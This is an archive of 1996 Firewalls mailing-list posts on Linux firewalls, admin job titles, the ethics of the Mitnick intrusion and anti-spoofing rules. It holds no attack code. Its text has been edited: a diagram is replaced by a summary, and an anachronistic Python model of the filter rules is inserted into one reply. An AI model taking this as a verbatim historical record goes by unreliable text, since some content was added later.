that can only barely tell you what the next version number is that you
need to wait for.  I've had SOME of these kinds of problems with the tech
"support" line of every company I've ever had to call such numbers from.
But then, I'm a technical person, and I know what to do to fix things
myself, only if I have the resources to do it with (e.g.
original source code that was reasonably written and compilable).  In many
cases I had to call the 800 number because that is what I was supposed to
do, but I ended up giving them the solution.  But not everyone fits in
that category.  You have to make the decision yourself about what is
appropriate for you.

I can reassure you that many people do use Linux for firewalls and are
very happy with it.  I don't at my day job, but that was what was decided
by people higher up before they even knew of Linux.

With Linux, you will have to do a lot more yourself.  I suggest you get a
copy and install it, run it, and play around with it, and see if you feel
comfortable with it.  You're sure to run into some problems.  Try to fix
them with the help of people on the comp.os.linux.* newsgroups and see if
that works for you.  If it does, then give it a shot as a firewall.  If
not, try something else.  Or if it is feasible, try more than one at a
time.

Good luck.

--
Phil Howard KA9WGN    +-------------------------------------------------+
Linux Consultant      | The enemy of my enemy is NOT my friend...       |
Milepost Services     |                 ...but he is a convenient ally! |
phil@milepost.com     +-------------------------------------------------+

From firewalls-owner Fri Jan 12 17:40:42 1996
Date: Fri, 12 Jan 1996 17:23:43 -0800
From: yevaud@netcom.com (Karl Wiebe)
Message-Id: <199601130123.RAA10481@netcom4.netcom.com>
To: Firewalls@GreatCircle.COM
Subject: Re: "Title for Firewall Admin?
Frederick M Avolio observed:
>
> On the Gauntlet Firewalls that we install, the management accounts of the
> firewall machine go to the firewall manager.
>
> But I can see, eventually, a need for a well known different term.
>
> Gee, another thing for the Firewall Product Developers Consortium to talk
> about. :-)  Quick... get famous.  Suggest a standard!
>
> "gatekeeper" is a fun possibility.  "doorman" is too plain.
>
[ 8< snip! 8< ]

Well, at the entrances to Roman villas during the Empire ( and Republic ),
a slave was posted ( well, chained to his post! ) who answered the door and
announced guests, named after the god Janus, god of doorways, and called the

...janitor.

--Karl

From firewalls-owner Fri Jan 12 17:55:42 1996
Date: Fri, 12 Jan 1996 18:49:08 -0600 (CST)
From: Ron DuFresne
To: jeff.aldrich@merrillcorp.com
Cc: firewalls@GreatCircle.COM
Subject: Re: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimomura
In-Reply-To: <01HZX2RY8G7694FG2L@vpn.stp.mrll.com>

On Fri, 12 Jan 1996 jeff.aldrich@merrillcorp.com wrote:

>
> A couple of people have mentioned that Mitnick may have been "invited"
> and was therefore entrapped.
> Maybe I'm missing something, but I don't
> necessarily see how having something left either intentionally or
> unintentionally vulnerable constitutes invitation to do damage.
> Seems to me like a burglar claiming entrapment because you invited
> him/her to steal things when you forgot to lock the door.
>
> I think entrapment entails actively enticing someone to engage in
> specific illegal activity.  Cops posing as prostitutes to catch
> customers, if done correctly, isn't entrapment.
>
> On the other hand, had Mr. Shimomura posted messages all over the
> Internet saying "Kevin Mitnick is a lamer, who couldn't crack an egg!"
> it might be a different story! ;-) (humor alert)
>

I recall not there being any 'damage' done other than the access and the
'taking' of copies of files that it seems should not have been on this
unprotected machine...

Now, leaving files, files that would prove to be invaluable not only to
security minded admins, but to crackers on an unprotected system, wouldn't
that come very close to your:

"Kevin Mitnick is a lamer, who couldn't crack an egg!"

Only change would be:

"see what great tools I have and you don't, come try and get em..."

Later,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."  -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D.  Just don't touch anything.
From firewalls-owner Fri Jan 12 18:10:42 1996
Date: Fri, 12 Jan 1996 18:06:45 +0100
To: Ron DuFresne
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimomura
Cc: firewalls@GreatCircle.COM

At 6:49 PM 1/12/96, Ron DuFresne wrote:
> I recall not there being any 'damage' done other than the access and the
> 'taking' of copies of files that it seems should not have been on this
> unprotected machine...

In other words, because those files (in your opinion) shouldn't have been
on that machine, it was OK for someone to break in and take them?  Sorry,
nice fantasy, but that's not the way the law works.

The front door of your home should never be unlocked when the house is
unattended.  If you go off and forget to lock it on your way out one day,
though, that absolutely definitely does NOT mean that it's proper or legal
or ethical or anything else for someone to come in and raid your stuff.

I think we've about reached the limit of absurdity on this thread; it's no
longer particularly relevant to firewalls.

-Brent
----------------------+----------------------------+------------------------
Brent Chapman         | Great Circle Associates    | 1057 West Dana Street
Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041
----------------------+----------------------------+------------------------
Internet Tutorials from the Experts!
From firewalls-owner Fri Jan 12 18:25:42 1996
Message-Id: <9601130214.AA28291@mailgate.nytimes.com>
To: firewalls@GreatCircle.Com
Date: Fri, 12 Jan 1996 21:05:56 EST
From: Gordy Thompson
Subject: Re: "Title for Firewall Admin?

At 04:04 PM 1/11/96 -0800, Bill Curr wrote:
>
> The mail administrator is "postmaster"
> The web server admin is "webmaster"
> Is there such a title for a firewall administrator?

Maybe it should be Pip, the kid in "Great Expectations" (this from
Information Week bwo Edupage:)

RESUME BUZZ WORDS FOR '96
Employers of information systems experts in 1996 will be looking for
people who know the Internet, client-server computing or networking,
according to hiring executives.  "IS organizations are looking for people
experienced in working with the Internet, particularly regarding security
issues and building firewalls," says the CEO of a Santa Monica, Calif.
consulting firm.  In the client-server area, expertise in C++, Visual
Basic and Forte programming is in demand, as well as front-end graphical
user interfaces, relational databases and help-desk support.  Programmers
who otherwise would be in the $50,000 to $60,000 salary category might see
an extra $10,000 to $20,000 tacked on for these skills, say some
recruiting experts.
(Information Week 1 Jan 96 p64)

==========================================================================
Gordon T. Thompson                        gordy@nytimes.com
Manager, Internet Services                212 556 1386
The New York Times                        fax: 212 556 1636
The Times and I have an arrangement: Neither of us speaks for the other.

From firewalls-owner Fri Jan 12 19:05:02 1996
From: "Archer, Barry J."
To: "'Firewalls Digest'"
Subject: Re: "Title for Firewall Admin?"
Date: Fri, 12 Jan 96 14:37:00 PST
Message-ID: <30F6E39D@at3038p.kc.bv.com>

Let's carry the dubious(?) thought further:

FireMaster

Barry

From firewalls-owner Fri Jan 12 19:10:42 1996
Message-Id: <199601130256.SAA07434@mailhost.Ipsilon.COM>
To: yevaud@netcom.com (Karl Wiebe)
Cc: Firewalls@GreatCircle.COM
Subject: Re: "Title for Firewall Admin?
In-Reply-To: Your message of "Fri, 12 Jan 1996 17:23:43 PST." <199601130123.RAA10481@netcom4.netcom.com>
Date: Fri, 12 Jan 1996 18:56:11 -0800
From: Craig Anderson

> Well, at the entrances to Roman villas during the Empire ( and Republic ),
> a slave was posted ( well, chained to his post! ) who answered the door and
> announced guests, named after the god Janus, god of doorways, and called the
>
> ...janitor.
>
> --Karl

Ahh ... when I am asked what I do (usually called system administrator) I
have always answered "software janitor".  It all makes sense now...

Craig

From firewalls-owner Fri Jan 12 19:13:06 1996
Date: Fri, 12 Jan 1996 12:45:52 -0800
To: firewalls@greatcircle.com
From: dbsmall@ttl.pactel.com (David B. Small)
Subject: Did this hack involve breaching a firewall?
Hello Firewallers,

I recently received this note about recent exploits of Canadian hackers:

    Security consultants say computer hackers have breached a leading
    American satellite TV direct-to-home company's security system to
    steal programming for decoding signals.  (Toronto Financial Post
    11 Jan 96 p3)
-----------------------------

What I'd like to know is:

1) Did this hack take place across the Internet?
2) What means were taken to secure the satellite TV direct-to-home
   company's site?

(Of course, what I'm getting at, really, is:

a) Could this have been prevented?
b) Is there something about this that we (firewallers) should be aware
   of, so that we secure our own sites?  (eg, was it hacked through a
   known method, or something new?)

-David

From firewalls-owner Fri Jan 12 19:24:32 1996
Subject: Re: Linux as a firewall
To: dana@nav.cc.tx.us (Dana Brewer)
Date: Fri, 12 Jan 1996 15:12:42 -0500 (EST)
From: "Michael H. Warfield"
Cc: firewalls@greatcircle.com
In-Reply-To: from "Dana Brewer" at Jan 12, 96 10:20:14 am

Dana Brewer enscribed thusly:

> I've noticed that a lot of people say they use Linux as part of their
> Internet firewall.  But now I've had a company tell me that Linux isn't a
> true multi-tasking operating system, so it shouldn't be used as a
> firewall.  What's the true story here?
> Ideally, in our situation, the
> bastion host would be the firewall, the WWW server, the ftp server, the
> Usenet news server, etc...  Is this completely unrealistic?

HUH?  WHAT?  Linux is NOT a multitasking operating system?  What drugs are
they on????  On what, pray tell, do they base such a rash statement?  You
might as well say UNIX is not a multitasking operating system.

On top of that...  As has been pointed out several times by others on this
list, you do not NEED a multitasking operating system to construct a
firewall.  Some have built acceptable firewalls with nothing but MS-DOS
(just the PC BIOS) underneath them.  Real secure too.  Nothing to bust
into.  So these jerks blew it on two counts with one statement.  I don't
think I would rely on their advice for anything now.

And yes, I do use Linux as the base system for several firewalls at
different sites.  One of these systems also does WWW and ftp and news and
mail as listed above.  Yes, before any of the purists on this list chime
in, that does compromise the firewall paradigm, but it works and works
well for me.

Anyone who tells you that Linux is not a true multitasking operating
system:

1) Obviously knows nothing about Linux.
2) Probably has no exposure to Linux.
3) Is probably just parroting some party line someone told them.
4) Is probably incompetent in many other areas as well.

Sounds like someone working for an outfit trying to compete against Linux
and is getting the short end of the stick.

> **************************************************************************
> Dana Brewer
> Director, Computer Center       Internet: dana@nav.cc.tx.us
> Navarro College                 Phone   : 903-874-6501
> 3200 W. 7th Ave.                FAX     : 903-874-4636
> Corsicana, TX 75110
>
> All opinions stated are my own, and probably don't even vaguely resemble
> those of Navarro College. :)
> **************************************************************************
>
>

Mike
--
Michael H.
Warfield            |  (770) 985-6132   |  mhw@WittsEnd.com
(The Mad Wizard)    |  (770) 925-8248   |  http://www.wittsend.com/mhw/
NIC whois: MHW9     | An optimist believes we live in the best of all
PGP Key: 0xDF1DD471 | possible worlds.  A pessimist is sure of it!

From firewalls-owner Fri Jan 12 19:55:42 1996
Date: Fri, 12 Jan 1996 22:40:47 -0500 (EST)
From: Rabid Wombat
To: Karl Wiebe
Cc: Firewalls@GreatCircle.COM
Subject: Re: "Title for Firewall Admin?
In-Reply-To: <199601130123.RAA10481@netcom4.netcom.com>

> >
> [ 8< snip! 8< ]
>
> Well, at the entrances to Roman villas during the Empire ( and Republic ),
> a slave was posted ( well, chained to his post! ) who answered the door and
> announced guests, named after the god Janus, god of doorways, and called the
>
> ...janitor.
>
> --Karl
>

KARL WINS !!!!
From firewalls-owner Fri Jan 12 20:10:42 1996
From: Eric Osborne
Message-Id: <199601130359.WAA00187@micron.notcom.com>
Subject: Re: Firewalls-Digest V5 #24
To: Firewalls@GreatCircle.COM
Date: Fri, 12 Jan 1996 22:59:24 -0500 (EST)
In-Reply-To: <199601122016.MAA29959@miles.greatcircle.com> from "firewalls-digest-owner@uunet.uu.net" at Jan 12, 96 12:16:53 pm

I understand the value of setting a firewall rule to disallow connections
from the outside that claim to have the IP addresses of the internal
(local) network, but let me ask you firewall gurus a question:

Is there any {point|feasibility|practicality} to setting something like:

    deny outgoing packets that are not from the internal net

The purpose of this, I would guess, is to prevent people on your network
from IP spoofing and hacking other networks.

Would this work?

??
eric

From firewalls-owner Fri Jan 12 20:25:42 1996
Date: Fri, 12 Jan 96 19:38:07 PST
From: ldr@taec.com (Larry Ridenour)
Message-Id: <9601130338.AA14221@borris.sanjose>
To: firewalls@GreatCircle.COM
Subject: Re: "Title for Firewall Admin?

"firemaster"  ?????????  HA! HA!

> From firewalls-owner@GreatCircle.COM Fri Jan 12 12:17:39 1996
> From: "Tim Crisall"
> Organization: Grant MacEwan Community College
> To: firewalls@GreatCircle.COM
> Date: Fri, 12 Jan 1996 12:18:32 MST
> Subject: Re: "Title for Firewall Admin?
> X-Mailer: Pegasus Mail v3.22
> Sender: firewalls-owner@GreatCircle.COM
> Content-Length: 278
>
> > The mail administrator is "postmaster"
> > The web server admin is "webmaster"
> > Is there such a title for a firewall administrator?
> > And is there a list of these colorful "nom de nets" anywhere?
> > Guardian Of Data
>          _ _ _
>
> Tim Crisall
> Grant MacEwan Community College
>

From firewalls-owner Fri Jan 12 20:40:42 1996
Message-ID: <01BAE1AA.47712FC0@rwcooper.rcooper.the-wire.com>
From: Russ Cooper
To: "firewalls@GreatCircle.COM"
Cc: "dannyc@gmap.leeds.ac.uk"
Subject: RE: Firewall design - routers and commercial kit
Date: Sat, 13 Jan 1996 11:28:35 -0500

BorderWare has the ability to put a third NIC in their Firewall making a
Secure Side Network.  The external NIC still has all its own servers, so
your IP translation is still in effect, and you're not allowing traffic
into your internal network whatsoever.  All this and you don't have to add
any additional routers to your configuration.

[ASCII diagram, garbled in this copy: the Outbound Router, the BorderWare
Firewall Server and the Internal Network along the main path, with the
Secure Side Network hanging off the firewall's third NIC to a WWW Server]

Cheers,
Russ Cooper
Sr.
Internet Integration Engineer SHL/Computer Innovations rcooper@the-wire.com -- rwcooper@shl.com "can someone tell me where to go today to get the money to go to where I want to go today" From firewalls-owner Fri Jan 12 20:55:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA23510 for firewalls-outgoing; Fri, 12 Jan 1996 20:51:14 -0800 (PST) Received: from taz.nda.com ([206.0.206.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA23488 for ; Fri, 12 Jan 1996 20:51:06 -0800 (PST) Received: (from kovar@localhost) by taz.nda.com (8.7.3/8.7.3) id UAA12586; Fri, 12 Jan 1996 20:50:02 -0800 (PST) From: David Kovar Message-Id: <199601130450.UAA12586@taz.nda.com> Subject: Re: "Title for Firewall Admin? To: craiga@Ipsilon.COM (Craig Anderson) Date: Fri, 12 Jan 1996 20:50:01 -0800 (PST) Cc: yevaud@netcom.com, Firewalls@GreatCircle.COM In-Reply-To: <199601130256.SAA07434@mailhost.Ipsilon.COM> from "Craig Anderson" at Jan 12, 96 06:56:11 pm X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Any chance of terminating this discussion? It's taken up more bandwidth than anything else on the list for the last few days. -David From firewalls-owner Fri Jan 12 21:10:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA22101 for firewalls-outgoing; Fri, 12 Jan 1996 20:40:10 -0800 (PST) Received: from gwydion.hns.st-louis.mo.us (dialup-105.icon-stl.net [199.217.153.105]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id UAA22094 for ; Fri, 12 Jan 1996 20:40:04 -0800 (PST) Received: (from kenth@localhost) by gwydion.hns.st-louis.mo.us (8.7.3/8.7.2) id WAA05762; Fri, 12 Jan 1996 22:39:13 -0600 (CST) From: Kent Hamilton Message-Id: <199601130439.WAA05762@gwydion.hns.st-louis.mo.us> Subject: Re: Mitnick & the TCP Sequence Number Attack on Shimomura (LONG posting) To: proberts@clark.net (Paul D. 
Robertson) Date: Fri, 12 Jan 1996 22:39:13 -0600 (CST) Cc: firewalls@greatcircle.com In-Reply-To: from "Paul D. Robertson" at Jan 11, 96 11:50:08 pm Reply-To: KentH@HNS.St-Louis.Mo.US X-Mailer: ELM [version 2.4 PL24 ME8b] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > On Thu, 11 Jan 1996, Brain21 wrote: > > > On Thu, 11 Jan 1996, Benjamin Allan Smith wrote: > > > > > email (3 complete overwrites with random data if I recall correctly) and then > > > > I thought that the NSA could read approx. 7 writes deep. If thought that > > you just put bullets in those drives (quite literally) instead of > > rewriting them. > > > > I'm sure someone who has a better memory will correct me, but I think > three or five complete overwrites used to be approved for up to secret > (no longer approved, and may have acutally been for up to top secret, > memory fades). I think it used to be 3 over-writes when I last had to worry about it. [ removed ] > Back before I entered the world of real classified, we had a big green > sledgehammer with which to destroy our secret wartime data that resided > on 2314 diskpacks. The BFGSH (Big _____ Green Sledge Hammer), correctly > weilded was I would suppose approved for emergency destruction only. I > don't think they trusted us with too many thermite grenades :( Hey, ours was *RED*..... :-) Actually for disk packs with TS on 'em the approved method for destruction about 7 years ago was to take a sander to the platter then degauss what was left... no idea if it's changed since then. 
--
Kent Hamilton                           Work: KHamilton@Hunter.COM
URL: http://www.icon-stl.net/~khamilto  Play: KentH@HNS.St-Louis.Mo.US

From firewalls-owner Fri Jan 12 21:10:55 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA20047 for firewalls-outgoing; Fri, 12 Jan 1996 20:23:21 -0800 (PST)
Received: from icicle (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA20033; Fri, 12 Jan 1996 20:23:09 -0800 (PST)
Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle (8.6.12/8.6.12) with ESMTP id WAA27564; Fri, 12 Jan 1996 22:21:54 -0600
Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id WAA23432; Fri, 12 Jan 1996 22:21:53 -0600
Posted-Date: Fri, 12 Jan 1996 22:21:53 -0600
Date: Fri, 12 Jan 1996 22:21:52 -0600 (CST)
From: Ron DuFresne
To: Brent Chapman , PADGETT@hobbes.orl.mmc.com, jeff.aldrich@merrillcorp.com, pnh1rgr@mclo10.med.navy.mil, brain21@montag33.residence.gatech.edu, ngps@cbn.com.sg, topher@ns.ncsa.com, mjr@switchblade.v-one.com
cc: firewalls@GreatCircle.COM
Subject: Re: Re[2]: Mitnick & the TCP Sequence Number Attack on Shimomura
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 12 Jan 1996, Brent Chapman wrote:

> At 6:49 PM 1/12/96, Ron DuFresne wrote:
>
> >I recall not there being any 'damage' done other than the access and the
> >'taking' of copies of files that it seems should not have been on this
> >unprotected machine...
>
> In other words, because those files (in your opinion) shouldn't have been
> on that machine, it was OK for someone to break in and take them? Sorry,
> nice fantasy, but that's not the way the law works.

Hmm, seems to have rustled your feathers a bit, well, that happens from time to time in life.... Actually, with all the posturing here, I was doing a bit of my own concerning this matter.
The main point being made on this end was that T. S. was surprisingly stupid for a man of his known talent and skills to have such tools exposed to what the paranoid here would like to term 'certain risk'. And that T. S. was in his own way then taunting Mitnick to come and grab copies of those tools. Course, one wonders, was said machine also bannering to potential 'crackers' something to the effect that this is a private machine and entrance is forbidden? Doesn't this have something to do with the "what is and is not expressly permitted" rules underlying the whole of network security?

>
> The front door of your home should never be unlocked when the house is
> unattended. If you go off and forget to lock it on your way out one day,
> though, that absolutely definitely does NOT mean that it's proper or legal
> or ethical or anything else for someone to come in and raid your stuff.
>

There are express differences here, and the laws aren't yet firmly paved in stone when it comes to defining the legalities of digital data as compared to property. Yes, much work has been done, still more needs to be done in this arena. Copyright law, while it exists, is little more than a moot warning. And unless a system is trashed, the copying of files is not on the same par as the physical taking of items from one's home. Someone else mentioned here that the SPA and other entities, unless there are big bucks involved, show little interest in many and most pirating of SW. Look at the rampant warez distribution in IRC for an example. Locally, a cracker was recently given a small slap on the wrist for taking down I forget which 'freenet', and this despite the fact that the kid has continued cracking systems after that incident. While this may threaten folks in the network security field in some sense, it's going to have to be looked at carefully.
Especially when viewed in a context on par with current Congressional legislation pending whose focus is concerned mostly with *indecency* and giving 'private' telcos the right to deal with long-distance services than the matter nigh at hand in this thread.

> I think we've about reached the limit of absurdity on this thread; it's no
> longer particularly relevant to firewalls.
>

Sure seems to be on topic and relevant in this light and when folks discuss it in the matters of how much regard was paid to the 'value' of the tools that T. S. unleashed into the hands of Mitnick and god knows who.

Later,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.

From firewalls-owner Fri Jan 12 22:25:43 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id WAA04880 for firewalls-outgoing; Fri, 12 Jan 1996 22:15:43 -0800 (PST)
Received: from sheeba.rcooper.the-wire.com (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id WAA04813 for ; Fri, 12 Jan 1996 22:15:26 -0800 (PST)
Received: from rwcooper.rcooper.the-wire.com ([205.206.47.2]) by sheeba.rcooper.the-wire.com (post.office MTA v1.9.1 evaluation license) with SMTP id AAA246; Sat, 13 Jan 1996 01:13:24 -0500
Received: by rwcooper.rcooper.the-wire.com with Microsoft Mail id <01BAE1B8.BA017640@rwcooper.rcooper.the-wire.com>; Sat, 13 Jan 1996 13:12:01 -0500
Message-ID: <01BAE1B8.BA017640@rwcooper.rcooper.the-wire.com>
From: Russ Cooper
To: "firewalls@GreatCircle.COM" , "'A. Padgett Peterson, P.E. Information Security'"
Subject: RE: Encryption export laws from US.
Date: Sat, 13 Jan 1996 13:11:47 -0500
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Padgett,

What about the use of DEC Tunnels for end to end roving encryption. Sounded pretty good to me when it was pitched at a recent trade show.

Cheers,

Russ Cooper
Sr. Internet Integration Engineer
SHL/Computer Innovations
rcooper@the-wire.com -- rwcooper@shl.com
"can someone tell me where to go today to get the money to go to where I want to go today"

From firewalls-owner Fri Jan 12 23:25:43 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA12819 for firewalls-outgoing; Fri, 12 Jan 1996 23:11:23 -0800 (PST)
Received: from [198.102.244.42] (pb520.greatcircle.com [198.102.244.42]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id XAA12795; Fri, 12 Jan 1996 23:11:15 -0800 (PST)
X-Sender: brent@miles.greatcircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Fri, 12 Jan 1996 23:11:33 +0100
To: Eric Osborne , Firewalls@GreatCircle.COM
From: Brent@GreatCircle.COM (Brent Chapman)
Subject: Re: Firewalls-Digest V5 #24
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 10:59 PM 1/12/96, Eric Osborne wrote:
>I understand the value of setting a firewall rule to disallow
>connections from the outside that claim to have the IP addresses of
>the internal (local) network, but let me ask you firewall gurus a
>question: Is there any {point|feasibility|practicality} to setting
>something like:
>
>deny outgoing packets that are not from the internal net
>
>The purpose of this, I would guess, is to prevent people on your
>network from IP spoofing and hacking other networks. Would this
>work?

Yes. It also prevents folks from using you as a "transit" network, to and from the Internet. Whether this is a feature or a bug depends on your situation.
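The two anti-spoofing rules in this exchange, and the "transit network" side effect Brent points out, modelled as a small filter over constructed packets. This is an added example, not code from the list; the internal address block, the interface names and the sample packets are assumptions chosen for illustration.

```python
"""Model of the two anti-spoofing rules discussed in the thread.

Added example, not from the list post.  The internal block (TEST-NET-1),
the interface names and the packets are constructed for illustration."""
import ipaddress
from dataclasses import dataclass

INTERNAL_NET = ipaddress.ip_network("192.0.2.0/24")  # assumed inside block
INSIDE, OUTSIDE = "int", "ext"                        # assumed interface names


@dataclass(frozen=True)
class Packet:
    in_iface: str   # interface the packet arrived on
    out_iface: str  # interface the router would forward it out of
    src: str
    dst: str


def filter_packet(pkt: Packet, net: ipaddress.IPv4Network = INTERNAL_NET) -> tuple:
    """Return (verdict, reason) for one forwarded packet."""
    src = ipaddress.ip_address(pkt.src)
    # Rule 1 (ingress): nothing arriving from the Internet may claim an
    # inside source address.
    if pkt.in_iface == OUTSIDE and src in net:
        return ("deny", "inbound packet spoofs an internal source")
    # Rule 2 (egress, the rule Eric asked about): nothing leaving toward the
    # Internet may carry a source address that is not ours.
    if pkt.out_iface == OUTSIDE and src not in net:
        if pkt.in_iface == OUTSIDE:
            # Came from the Internet and is going back to the Internet: the
            # site is being used as a transit network, Brent's side effect.
            return ("deny", "transit traffic between two external networks")
        return ("deny", "spoofed source leaving from the inside")
    return ("permit", "source address consistent with interface")


def audit(packets) -> dict:
    """Apply the filter to a batch and return verdict counts."""
    counts = {"permit": 0, "deny": 0}
    for p in packets:
        counts[filter_packet(p)[0]] += 1
    return counts


# Constructed sample traffic (one packet per case the thread talks about)
SAMPLE = [
    Packet(INSIDE, OUTSIDE, "192.0.2.10", "198.51.100.5"),    # normal outbound
    Packet(OUTSIDE, INSIDE, "198.51.100.5", "192.0.2.10"),    # normal inbound
    Packet(OUTSIDE, INSIDE, "192.0.2.99", "192.0.2.10"),      # inbound spoof
    Packet(INSIDE, OUTSIDE, "203.0.113.7", "198.51.100.5"),   # outbound spoof
    Packet(OUTSIDE, OUTSIDE, "203.0.113.7", "198.51.100.5"),  # transit
]

if __name__ == "__main__":
    for p in SAMPLE:
        print(f"{p.in_iface}->{p.out_iface} {p.src} -> {p.dst}: {filter_packet(p)}")
    print(audit(SAMPLE))
```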
-Brent

----------------------+----------------------------+------------------------
Brent Chapman         | Great Circle Associates    | 1057 West Dana Street
Brent@GreatCircle.COM | http://www.greatcircle.com | Mountain View, CA 94041
----------------------+----------------------------+------------------------
                     Internet Tutorials from the Experts!

From firewalls-owner Fri Jan 12 23:55:43 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id XAA17381 for firewalls-outgoing; Fri, 12 Jan 1996 23:49:34 -0800 (PST)
Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id XAA17350 for ; Fri, 12 Jan 1996 23:49:27 -0800 (PST)
Received: from cixgate by relay2.UU.NET with SMTP id QQzyhr00447; Sat, 13 Jan 1996 02:48:23 -0500 (EST)
Received: from manzanita.DEV.3Com.COM.noname ([139.87.180.206]) by cixgate (4.1/SMI-4.1/3com-cixgate-GCA-931027-01) id AA04154; Fri, 12 Jan 96 23:57:19 PST
Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) id AA01213; Fri, 12 Jan 96 23:42:51 PST
Date: Fri, 12 Jan 96 23:42:51 PST
From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg)
Message-Id: <9601130742.AA01213@manzanita.DEV.3Com.COM.noname>
To: mjr@v-one.com, peter@nmti.com
Subject: Re: "Title for Firewall Admin?
Cc: Firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> I think most firewall admins are known by the title:
> "Is the Web down?"

The one I get is "Is the Internet down?"...

----- End Included Message -----

Yes, as if "The Internet" were say.... Woolworths. As in "Is the grocery store closed?
BobK

From firewalls-owner Sat Jan 13 05:25:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA11537 for firewalls-outgoing; Sat, 13 Jan 1996 05:21:38 -0800 (PST)
Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA11516 for ; Sat, 13 Jan 1996 05:21:31 -0800 (PST)
Date: Sat, 13 Jan 1996 8:20:28 -0500 (EST)
From: "A. Padgett Peterson, P.E. Information Security"
To: firewalls@greatcircle.com
Message-Id: <960113082028.20205193@hobbes.orl.mmc.com>
Subject: Postulate on Lawz
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In all of the comments on "inducement", "B&E" et al the discussion seems to be missing one vital point: our (well my) mission in life is to avoid the need for law enforcement by making sure that the transgression never happens.

True, I have seen people "terminated" (HR's term) for electronic transgressions - usually "mischarging" - but each time have felt that the system failed else things would not have gone that far.

Prosecution does nothing to repair damage. Some justify it by saying it acts as a deterrent but IMNSHO (and in agreement with some of Pavlov's later work) only if enforcement is perceived as universal. About the time speeding stopped meaning a sure ticket and started being perceived as something involving "luck" and "selective enforcement" became an accepted practise, this ceased to be effective. That leaves only revenge.

My concept of the job is to make sure that such things do not happen in the first place by denying those who might be tempted a "target rich" environment. An effective firewall is one defensive measure but only one layer. Active measures (daemon pingers, socket openers, minefields) are another piece. Gentle notes of the type "Activity X was observed from this account at time Y. Were you having a problem ?" have proven very effective particularly when signed by "Guns & Dogs Inc."
(Yes, we post monitoring warnings and all accounts are traceable to an employee who has signed an access agreement).

Along these lines, the most irritating headline I have seen recently was the bit in the NYTimes about "Security Flaws in the Internet". There are no security flaws in the Internet because there is no security in the Internet. Like the lady taking a man's (original was "Army" but that has no meaning today) physical, "There's nothing wrong, it is just not there."

Security is the responsibility of the users. RFCs provide standardized ways for the users to achieve secure communications but that is not the responsibility of the Internet, its sole responsibility is to "deliver the mail".

Warmly,
Padgett

ps "Keeper of the Eternal Flame"

From firewalls-owner Sat Jan 13 08:40:44 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA18037 for firewalls-outgoing; Sat, 13 Jan 1996 08:28:28 -0800 (PST)
Received: from netcom.netcom.com (netcom.netcom.com [192.100.81.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA18032 for ; Sat, 13 Jan 1996 08:28:24 -0800 (PST)
Received: by netcom.netcom.com (8.6.12/Netcom) id IAA24907; Sat, 13 Jan 1996 08:25:43 -0800
Message-Id: <2.2.32.19960113172605.006b5c9c@netcom.com>
X-Sender: dalel@netcom.com
X-Mailer: Windows Eudora Pro Version 2.2 (32)
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sat, 13 Jan 1996 11:26:05 -0600
To: "A. Padgett Peterson, P.E. Information Security"
From: Dale Lancaster
Subject: re: "Q" Clearance
Cc: firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 01:39 PM 1/12/96 -0500, A. Padgett Peterson, P.E. Information Security wrote:
